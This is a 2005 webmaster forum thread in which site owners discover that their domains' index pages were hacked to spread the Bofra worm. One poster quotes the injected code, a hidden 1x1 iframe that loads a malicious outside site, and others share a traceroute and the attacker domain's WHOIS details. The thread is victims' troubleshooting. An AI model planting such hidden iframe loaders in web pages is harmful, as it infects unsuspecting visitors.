Help! Domain spoofing... - GoFuckYourself.com

Dagwolf · 04-12-2005, 04:51 AM

I have a problem with a couple of domains. I lost contact with the host they were on and could no longer log in to ftp.

One of the domains, when I attempt to reach it, seems to load the correct page BUT with a virus! No virus on the other site's index page but it too has been obviously tampered with.

I pointed the domains to a new host and was shocked to find that they STILL load the same pages! With a little research I deduced that someone is "spoofing" my domains..

What I don't know is, how do I stop it?

megatgpdotnet · 04-12-2005, 04:53 AM

Have you tried to scan your PC with antispyware. How about accessing the sites trough another computer?

Dagwolf · 04-12-2005, 04:57 AM

Quote:

Originally Posted by megatgpdotnet

Have you tried to scan your PC with antispyware. How about accessing the sites trough another computer?

Both. Anyone attempting to access these domains is directed undetectably to a duplicate site which is neither on my old host nor on my new one. altered to suit someone else's purposes.

Dagwolf · 04-12-2005, 05:40 AM

Still stuck

Dagwolf · 04-12-2005, 05:46 AM

Might changing registrars help?

Boss Traffic Jim · 04-12-2005, 06:12 AM

Pretty much sounds near impossible, can you give the url's so we can investigate it for you?

Dagwolf · 04-12-2005, 06:21 AM

Quote:

Originally Posted by megatgpdotnet

Have you tried to scan your PC with antispyware. How about accessing the sites trough another computer?

Using a proxy server, I was able to reach the correct site.

Dagwolf · 04-12-2005, 06:22 AM

Quote:

Originally Posted by Afrin

Pretty much sounds near impossible, can you give the url's so we can investigate it for you?

I don't want to be responsible for the spread of a virus that appears to be coming from one of my websites...

Dagwolf · 04-12-2005, 06:25 AM

Does this help?

Quote:

Tracert to (mydomain).com
Generated by www.DNSstuff.com at 13:23:32 GMT on 12 Apr 2005.
Hop Time 1 Time 2 Time 3 IP Hostname Return TTL Country Time
1 2 ms 7 ms 6 ms 206.196.11.254 [www.DNSstuff.com 1st hop] 64 United States
2 3 ms 6 ms 5 ms 216.26.129.91 core-rtr02.ge-1-3-0.sdf.xodiax.net. 252 United States
3 68 ms 410 ms 27 ms 216.26.129.91 core-rtr02.ge-1-3-0.sdf.xodiax.net. 252 United States
4 10 ms 13 ms 12 ms 216.26.128.181 edge-rtr02.ge-0-3-0.sdf.xodiax.net. 252 United States
5 8 ms 17 ms 17 ms 65.117.168.137 chi-edge-09.inet.qwest.net. 251 United States Unix: 13:23:33.426
6 8 ms 14 ms 14 ms 205.171.20.121 chi-core-01.inet.qwest.net. 250 United States
7 8 ms 12 ms 11 ms 205.171.205.34 cer-core-01.inet.qwest.net. 249 United States
8 8 ms 20 ms 20 ms 205.171.139.146 chp-brdr-01.inet.qwest.net. 249 United States
9 8 ms 11 ms 11 ms 208.50.13.249 so3-1-1-622M.ar1.CHI2.gblx.net. 247 United States Unix: 13:23:33.642
10 72 ms 81 ms 90 ms 67.17.66.169 so1-0-0-2488M.ar2.TPA1.gblx.net. 245 United States
11 100 ms 108 ms 118 ms 64.215.80.66 ExpedientSago-NetworksDashboard-Communications.ge-2-0-0.ar2.TPA1.gblx.net. 55 United States
12 77 ms 99 ms 131 ms 65.110.32.8 gi0-1.ds01.tpa.sagonet.net. 245 United States Unix: 13:23:33.994
13 68 ms 77 ms 86 ms 63.246.157.19
[Reached Destination]unknown.sagonet.net. 53 United States

Dagwolf · 04-12-2005, 07:36 AM

Domain is redirecting to best-voyeur.info, which is the actual source of the virus (don't GO there unless
'you're a pro!)

It seems to be some sort of java applet/ infects the computer with iworm-bofra according to AVG.

Fake phone number, obviously..

Domain ID:D7816484-LRMS
Domain Name:BEST-VOYEUR.INFO
Created On:25-Oct-2004 14:39:24 UTC
Last Updated On:09-Dec-2004 13:08:11 UTC
Expiration Date:25-Oct-2005 14:39:24 UTC
Sponsoring Registrar:R136-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C7175719-LRMS
Registrant Name:Edward Lester
Registrant Street1:7338 Flamingo
Registrant City:Algonac
Registrant State/Province:MI
Registrant Postal Code:48001
Registrant Country:US
Registrant Phone:+1.10234567
Registrant *****************@yahoo.com

DirkPitt · 07-13-2005, 05:11 PM

I just noticed this exact thing happening to one of my domains. It's redirecting to the same place. best-voyeur.info. Like Dagwolf DON'T GO THERE!!! It's not a virus on the end user, to me it looks like somebody hacked into the server and made the modifications to the index.htm. I just uploaded a backup index and the problem went away. This post started 4/12 anybody know anything more?

4Pics · 07-13-2005, 05:12 PM

You might want to see what scripts you are running... if phpbb then it could be that.

DirkPitt · 07-13-2005, 05:18 PM

Quote:

Originally Posted by 4Pics

You might want to see what scripts you are running... if phpbb then it could be that.

The only script on the index is a banner js. I fixed the problem by just uploading a backup I had. That's why I think somebody got in there.

DirkPitt · 07-13-2005, 06:00 PM

This is what I found in my index file.

Code:

<div style="visibility:hidden"><iframe src=" http://best-voyeur.info/ggl/" width=1 height=1></iframe></div>

Quickdraw · 07-13-2005, 06:09 PM

These sites have that code as well(at least the few I checked)
http://www.google.com/search?hl=en&l...t-voyeur.info/

04-12-2005, 04:51 AM	#1
Dagwolf President of Canada Join Date: Sep 2003 Location: Leaving Hell, Entering Limbo Posts: 23,141	Help! Domain spoofing... I have a problem with a couple of domains. I lost contact with the host they were on and could no longer log in to ftp. One of the domains, when I attempt to reach it, seems to load the correct page BUT with a virus! No virus on the other site's index page but it too has been obviously tampered with. I pointed the domains to a new host and was shocked to find that they STILL load the same pages! With a little research I deduced that someone is "spoofing" my domains.. What I don't know is, how do I stop it? __________________ Sleep well, and dream of large women.

04-12-2005, 04:53 AM	#2
megatgpdotnet Confirmed User Join Date: Jun 2004 Location: EU Posts: 1,296	Have you tried to scan your PC with antispyware. How about accessing the sites trough another computer? __________________ ICQ: 343 896 902 \| Traffic: Buy and Sell \| My top sponsors: Dating (1:26 fs) \| Webcams (20% lifetime) \| $25 / free signup \| Paysites (trials, crossells, alternative billing) \| Other Stuff .com domains $7.99 \| Dreamhost promo codes \| Cheap quality content \| Embed Tube Script Toplists: 1 \| 2

04-12-2005, 05:40 AM	#4
Dagwolf President of Canada Join Date: Sep 2003 Location: Leaving Hell, Entering Limbo Posts: 23,141	Still stuck __________________ Sleep well, and dream of large women.

04-12-2005, 05:46 AM	#5
Dagwolf President of Canada Join Date: Sep 2003 Location: Leaving Hell, Entering Limbo Posts: 23,141	Might changing registrars help? __________________ Sleep well, and dream of large women.

04-12-2005, 07:36 AM	#10
Dagwolf President of Canada Join Date: Sep 2003 Location: Leaving Hell, Entering Limbo Posts: 23,141	Domain is redirecting to best-voyeur.info, which is the actual source of the virus (don't GO there unless 'you're a pro!) It seems to be some sort of java applet/ infects the computer with iworm-bofra according to AVG. Fake phone number, obviously.. Domain ID:D7816484-LRMS Domain Name:BEST-VOYEUR.INFO Created On:25-Oct-2004 14:39:24 UTC Last Updated On:09-Dec-2004 13:08:11 UTC Expiration Date:25-Oct-2005 14:39:24 UTC Sponsoring Registrar:R136-LRMS Status:ACTIVE Status:OK Registrant ID:C7175719-LRMS Registrant Name:Edward Lester Registrant Street1:7338 Flamingo Registrant City:Algonac Registrant State/Province:MI Registrant Postal Code:48001 Registrant Country:US Registrant Phone:+1.10234567 Registrant *****************@yahoo.com __________________ Sleep well, and dream of large women.

04-12-2005, 06:12 AM	#6
Boss Traffic Jim Confirmed User Join Date: Nov 2002 Location: USA Posts: 1,150	Pretty much sounds near impossible, can you give the url's so we can investigate it for you?

07-13-2005, 05:11 PM	#11
DirkPitt Confirmed User Join Date: Sep 2002 Location: Mars Posts: 357	I just noticed this exact thing happening to one of my domains. It's redirecting to the same place. best-voyeur.info. Like Dagwolf DON'T GO THERE!!! It's not a virus on the end user, to me it looks like somebody hacked into the server and made the modifications to the index.htm. I just uploaded a backup index and the problem went away. This post started 4/12 anybody know anything more? __________________ Thanks, Kit

07-13-2005, 05:12 PM	#12
4Pics Confirmed User Industry Role: Join Date: Dec 2001 Posts: 7,952	You might want to see what scripts you are running... if phpbb then it could be that.

07-13-2005, 06:00 PM	#14
DirkPitt Confirmed User Join Date: Sep 2002 Location: Mars Posts: 357	This is what I found in my index file. Code: <div style="visibility:hidden"><iframe src=" http://best-voyeur.info/ggl/" width=1 height=1></iframe></div> __________________ Thanks, Kit

07-13-2005, 06:09 PM	#15
Quickdraw Confirmed User Join Date: Mar 2004 Location: → → → Posts: 1,717	These sites have that code as well(at least the few I checked) http://www.google.com/search?hl=en&l...t-voyeur.info/